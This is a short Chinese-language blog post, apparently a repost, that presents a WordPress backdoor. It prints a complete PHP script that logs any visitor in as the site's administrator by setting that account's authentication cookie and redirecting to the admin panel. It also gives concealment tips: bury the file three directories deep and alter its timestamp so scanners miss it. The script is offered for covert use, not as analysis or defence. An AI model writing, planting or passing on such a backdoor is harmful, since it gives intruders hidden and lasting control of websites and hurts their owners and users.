猥琐的wordpress后门

一个可以自动调用管理员帐号登录wordpress后台的方法。
<?php

    require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。
    $query_str = "SELECT ID FROM $wpdb->users";
    $user_ids = $wpdb->get_results($query_str);
    foreach ($user_ids as $uid) {
        $user_id = $uid->ID;
        if (user_can($user_id, 'administrator')) {
            $user_info = get_userdata($user_id);
            $user_login = $user_info->user_login;
            wp_set_current_user($user_id, $user_login);
            wp_set_auth_cookie($user_id);
            do_action('wp_login', $user_login);
            echo "You are logged in as $user_login";
            if (function_exists('get_admin_url')) {
                wp_redirect(get_admin_url());
            } else {
                wp_redirect(get_bloginfo('wpurl') . '/wp-admin');
            }
            exit;
        }
    }


?>

都进入后台了,搞啥都可以了,wordpress的后台,你懂的。
4 B' h+ S# }: {& h
预计可以过所有的防御,只要你把时间改了,预计所有的扫描工具都扫不出来他是后门,因为他根本就不是后门。4 C0 Y. r& I& Q, m

  原文链接:http://www.5kik.com/phpnews/554.html

相关文章

发表评论:

验证码

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。